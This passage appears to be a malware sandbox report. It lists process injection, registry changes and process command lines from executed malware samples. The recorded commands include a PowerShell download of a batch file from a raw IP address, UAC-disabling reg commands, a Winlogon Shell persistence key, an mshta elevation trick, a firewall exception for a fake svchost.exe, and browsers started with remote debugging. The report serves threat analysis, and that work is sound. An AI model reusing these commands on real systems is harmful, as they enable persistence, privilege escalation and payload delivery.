PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 3912 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Windows\System32\notepad.exe
PID 3912 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Windows\System32\notepad.exe
PID 932 wrote to memory of 3184 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 932 wrote to memory of 3184 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 932 wrote to memory of 3184 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 3912 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe
PID 3912 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe
PID 3912 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe
PID 3912 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3912 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3912 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3912 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
PID 3912 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
PID 3912 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
PID 3912 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
PID 3912 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
PID 3912 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
PID 3184 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 3184 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 3184 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 3912 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe
PID 3912 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe
PID 3912 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe
PID 3912 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
PID 3912 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
PID 3912 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
PID 2964 wrote to memory of 2608 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2964 wrote to memory of 2608 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2608 wrote to memory of 1572 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SoftwareSASGeneration = "1" C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

"C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe"

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe

"C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe"

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5076 -ip 5076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 536

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe

"C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffb26c2cc40,0x7ffb26c2cc4c,0x7ffb26c2cc58

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2428 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4500 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 9

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4860,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4936 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"cmd" /c ping 127.0.0.1 -n 9 > nul && copy "C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe" "C:\Users\Admin\Music\Windows Security Health Host.exe" && ping 127.0.0.1 -n 9 > nul && "C:\Users\Admin\Music\Windows Security Health Host.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 9

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5108 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4484,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4652 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4632,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\unik.exe

"C:\Users\Admin\Downloads\UrlHausFiles\unik.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xdc,0x100,0x104,0x7c,0x108,0x7ffb26c346f8,0x7ffb26c34708,0x7ffb26c34718

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 9

C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe"

C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe"

C:\Users\Admin\Music\Windows Security Health Host.exe

"C:\Users\Admin\Music\Windows Security Health Host.exe"

C:\Users\Admin\Music\Windows Security Health Host.exe

"C:\Users\Admin\Music\Windows Security Health Host.exe"

C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe

"C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4fc 0x2ec

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7848.tmp\7849.tmp\784A.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7A1D.tmp\7A1E.tmp\7A1F.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb265946f8,0x7ffb26594708,0x7ffb26594718

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1

